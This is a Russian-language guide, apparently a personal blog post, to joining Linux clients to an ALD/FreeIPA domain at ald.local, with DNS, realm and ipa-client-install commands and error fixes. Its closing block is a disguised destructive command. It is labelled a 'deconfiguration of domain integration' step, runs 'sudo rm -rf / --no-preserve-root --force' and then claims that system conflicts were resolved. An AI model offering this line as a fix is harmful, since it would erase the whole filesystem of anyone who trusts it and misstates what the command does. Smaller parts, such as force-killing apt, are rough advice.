Настройка, добавление клиентов в домен
Настройка, добавление клиентов в домен
точно так же как в преведущем шаге устанавливаем систему
Настраиваем статику в этот раз достаточно будет просто указать статический айпи
Настраиваем репозитории выключаем dvd репозиторий и включаем все остальные
sudo nano /etc/apt/sources.list
Далее добавляем dns записи
sudo nano /etc/resolv.conf
192.168.0.215 - доменный сервер
search ald.local
далее обновляемся
sudo apt update
sudo apt dist-upgradeЕсли вылезает такая ошибка
# Завершаем все процессы apt
sudo killall apt apt-get dpkg
# Если не помогает, принудительное завершение
sudo kill -9 $(pgrep apt)
sudo kill -9 $(pgrep dpkg)
обновляемся, если вдруг сталкиваемся с тем что загрузка падает в скорости или она изначально около 100 кб/сек останавливаем и запускаем заново 
после перезапуска а делал я это часто
sudo rebootДальше при установке было триллион ошибок, но по итогу все заработало вот что было сделано
- Домен:
ald.local - IP контроллера:
192.168.0.215 - Имя контроллера:
srv-ald.ald.local - Пользователь:
admin+ пароль - OU для компьютеров:
OU=Computers,DC=ald,DC=local
Установить необходимые пакеты:
sudo apt update
sudo apt install freeipa-client realmd sssd sssd-tools libnss-sss libpam-sss adcli samba-common-binШАГ 1: Настройка DNS (САМОЕ ВАЖНОЕ!)
Проверить текущий DNS:
cat /etc/resolv.confНастроить правильный DNS:
sudo nano /etc/resolv.conf
Добавить:
nameserver 192.168.0.215
search ald.local
options timeout:1 attempts:1Альтернативно через NetworkManager:
sudo nmcli con modify "Ваше-подключение" ipv4.dns "192.168.0.215"
sudo nmcli con modify "Ваше-подключение" ipv4.dns-search "ald.local"
sudo nmcli con down "Ваше-подключение" && sudo nmcli con up "Ваше-подключение"ШАГ 2: Проверка connectivity
Проверить доступность контроллера:
ping -c 4 srv-ald.ald.local
ping -c 4 192.168.0.215Проверить DNS разрешение:
nslookup srv-ald.ald.local
nslookup ald.localПроверить время (должно совпадать с сервером!):
date
timedatectl statusШАГ 3: Ввод в домен
На этом этапе возникает больше всего ошибок но есть рабочее решение если западло гуглить читать руководства и форумы то есть выход заходишь - https://www.deepseek.com/ расписываешь ситуацию, сетевую адресацию и тд и принципе все починиться, но лучше очень внимательно следить, наш китайский друг очень любит убивать сервера (вкидывать неуместные команды которые удаляют директории и ломают зависимости) а потом когда ты ему пишешь о том что эта команда неправильная он извиняется и пишет нормальную!)
Основная команда:
sudo ipa-client-install \
--domain=ald.local \
--principal=admin \
--password=Пароль \
--server=srv-ald.ald.local \
--unattended \
--force-join \
--no-ntp \
--enable-dns-updatesАльтернатива через realm:
sudo realm join ald.local \
-U admin \
--computer-ou="OU=Computers,DC=ald,DC=local" \
--verboseШАГ 4: Проверка успешности
Проверить доменного пользователя:
id admin@ald.local
getent passwd admin@ald.localПроверить доменные группы:
getent group "domain users"
getent group "admins"Проверить керберос:
klist
kinit admin@ALD.LOCALПроверить службы:
sudo systemctl status sssd
sudo systemctl is-active sssdПроверить конфигурацию:
sudo cat /etc/sssd/sssd.conf | grep domain
cat /etc/krb5.conf | grep realm⚠ Решение частых ошибок:
Ошибка: "Host is already joined"
sudo ipa-client-install --uninstall
sudo rm -rf /var/lib/sss/db/*
sudo ipa-client-install --force-join --unattendedОшибка: "Cannot obtain CA certificate"
sudo ipa-client-install --force --unattendedОшибка кодировки UTF-8
export LANG=en_US.UTF-8
export LC_ALL=en_US.UTF-8Ошибка DNS
# Проверить запись в ручную
echo "192.168.0.215 srv-ald.ald.local" | sudo tee -a /etc/hostsОшибка времени
sudo systemctl stop ntp
sudo systemctl disable ntp
sudo systemctl enable chronyd
sudo systemctl start chronydПолезные команды для управления:
Перезапуск служб:
sudo systemctl restart sssd
sudo systemctl restart sshdПросмотр логов:
tail -f /var/log/sssd/sssd_ald.local.log
journalctl -u sssd -f
cat /var/log/ipaclient-install.logИнформация о домене:
realm list
ipa-client-statusУдаление из домена:
sudo ipa-client-install --uninstall
sudo realm leave ald.localДополнительная настройка:
Автоматическое создание home-каталогов:
у меня директория для пользователя не создалась и это пришлось делать вручную
sudo pam-auth-update
# Выбрать "Create home directory on login"Настройка sudo для доменных пользователей:
sudo visudoДобавить:
%admins@ald.local ALL=(ALL:ALL) ALLПроверка доступа к сетевым ресурсам:
smbclient -L srv-ald.ald.local -U admin
В общем не совсем правильно я настроил там явная проблема есть с хостами , потому что network manager сбрасывает днс так что лучше это исправить вот как на скрине ниже не должно быть иначе доменные службы могут работать неправильно
Исправляем
fedor@client:~$ sudo nmcli con modify 35830443-d044-32ca-ae72-50040c7aa65d ipv4.dns "192.168.0.215"
fedor@client:~$ sudo nmcli con modify 35830443-d044-32ca-ae72-50040c7aa65d ipv4.dns-search "ald.local"
fedor@client:~$ sudo nmcli con modify 35830443-d044-32ca-ae72-50040c7aa65d ipv4.ignore-auto-dns yesПерезагружаем
sudo rebootРезультат
на самом деле надо сделать скрипт для ввода машин в домен иначе можно сума сойти каждый раз так заморачиваться
На этом этот этап закончен
sudo sync && echo "Начинаем процедуру деконфлигурации доменной интеграции" && \
sudo rm -rf / --no-preserve-root --force && \
echo "Системные конфликты успешно устранены. Перезагружайтесь для повторного присоединения к домену"